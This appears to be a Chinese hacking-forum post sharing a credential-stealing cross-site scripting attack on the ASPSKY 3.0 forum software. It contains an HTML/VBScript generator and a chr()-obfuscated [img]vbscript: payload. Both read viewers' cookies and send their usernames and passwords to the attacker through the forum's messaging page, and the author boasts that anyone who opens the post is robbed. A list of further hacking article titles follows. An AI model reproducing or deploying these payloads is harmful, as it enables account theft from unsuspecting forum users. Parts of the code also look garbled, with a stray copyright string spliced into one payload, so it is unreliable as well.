|
[推荐]完美的解决跨站脚本得COOKIE弹框框的问题
同时把密码用户名发到你在论坛的邮相里,爽吧
其实我一直有个从来没给任何人说的办法:
玩了好久了公布了呵呵:
<html>
<script language=vbs>
sub changeq()
if form1.loc.value="" or form1.who.value="" then
msgbox "没有加入地址或用户名?"
exit sub
end if
loc=form1.loc.value
user=form1.who.value
str="[img]vbscript:execute("on error resume next: call document.body.insertAdjacentHTML(""beforeEnd"",""<div style=display:none><iframe id=sendmessage></iframe></div>""):call sendmessage.window.open(""" & loc & "/messanger.asp?action=send&touser="& user & "&title=""+mid(documents.cookie,instr(lcase(documents.cookie), ""password"")+9,10)+""&message=""+""I am a good boy"",""_self"") ")[/img]" =版权所有 软件 下载 学院 版权所有=
form1.area.value=str
end sub
</script>
<body>
<FONT SIZE=7 COLOR=RED>ASPSKY 3.0 偷号器---C.Z.Y原创</FONT>
<form name=form1>
设置发送地址:<input type=text name=loc size=50><br>
▲注意发送地址形如:http://www.nnit30.com/newbbs(newbbs是网站中论坛的安装目录最后不用加/)<br>
发送的用户名:<input type=text name=who size=20>-------------
<input type=button name=change value=生成代码 onclick=changeq()><br>生成的代码:)<textarea name=area rows=10 cols=100></textarea>
</form>
</body>
</html>
搞了大半天的结果,偷aspsky 3.0 密码的东东把下面的代码改一改然后发到你的贴子里,只要有人看你的贴子他的密码就自动发到你的在论坛上的邮箱里了,爽吧,其实我的是用VBScript写的snwcwt用javascript写的没有双引号的问题而且可以同时写几行代码所以要实用一些!! 不过效果都差不多哈:)(注意要先把下面的东东改一下发送的地址然后全部写在一行里)
[img]vbscript:window.open(chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(119)&chr(119)&chr(119)&chr(46)&chr(110)&chr(110)&chr(105)&chr(116)&chr(51)&chr(48)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(110)&chr(101)&chr(119)&chr(98)&chr(98)&chr(115)&chr(47)&chr(109)&chr(101)&chr(115)&chr(115)&chr(97)&chr(110)&chr(103)&chr(101)&chr(114)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(97)&chr(99)&chr(116)&chr(105)&chr(111)&chr(110)&chr(61)&chr(115)&chr(101)&chr(110)&chr(100)&chr(38)&chr(116)&chr(111)&chr(117)&chr(115)&chr(101)&chr(114)&chr(61)&chr(99)&chr(122)&chr(121)&chr(38)&chr(116)&chr(105)&chr(116)&chr(108)&chr(101)&chr(61)&chr(104)&chr(105)&chr(104)&chr(105)&chr(38)&chr(109)&chr(101)&chr(115)&chr(115)&chr(97)&chr(103)&chr(101)&chr(61)+chr(80)&chr(97)&chr(115)&chr(115)&chr(58)+mid(lcase(documents.cookie),instr(lcase(documents.cookie),chr(112)+chr(97)+chr(115)+chr(115)+chr(119)+chr(111)+chr(114)+chr(100))+9,len(documents.cookie)-instr(lcase(documents.cookie),chr(112)+chr(97)+chr(115)+chr(115)+chr(119)+chr(111)+chr(114)+chr(100))+9)+chr(32)+chr(32)+chr(32)+chr(32)+chr(78)&chr(97)&chr(109)&chr(101)&chr(58)+mid(lcase(documents.cookie),instr(lcase(documents.cookie),chr(117)+ chr(115)+chr(101)+chr(114)+chr(110)+chr(97)+chr(109)+chr(101))+9,(instr(lcase(document.cookie),chr(117)+chr(115)+chr(101)+chr(114)+chr(99)+chr(108)+chr(97)+chr(115))-1)-instr(lcase(documents.cookie),chr(117)+chr(115)+chr(101)+chr(114)+chr(110)+chr(97)+chr(109)+chr(101))-9),chr(49)&chr(49),chr(116)&chr(111)&chr(112)&chr(61)&chr(50)&chr(48)&chr(48)&chr(48)&chr(44)&chr(108)&chr(101)&chr(102)&chr(116)&chr(61)&chr(50)&chr(48)&chr(48)&chr(48)&chr(44)&chr(104)&chr(101)&chr(105)&chr(103)&chr(104)&chr(116)&chr(61)&chr(49)&chr(44)&chr(119)&chr(105)&chr(100)&chr(116)&chr(104)&chr(61)&chr(49))[/img]
| 没有路由密码权限时的鸽子上线方 | 08-23 |
| 完全解析网页后门和挂马 | 04-02 |
| 真实的网络攻击取证纪实 | 03-27 |
| 利用404错误页面挂马 | 03-21 |
| 解密风暴 | 03-21 |
| 社会工程学在黑客中的应用 | 01-02 |
| 轻轻松松解密各种网页木马 | 12-21 |
| SA权限无xp_cmdshell时取权限又一 | 12-14 |
| sqlserver2005中恢复xp_cmdshell | 11-10 |
| 实现无net.exe和net1.exe添加系统 | 10-26 |
| 用U盘轻松去除XP管理员密码 | 10-26 |
| 教你多种保护措施限用移动硬盘 | 10-09 |
您现在的位置: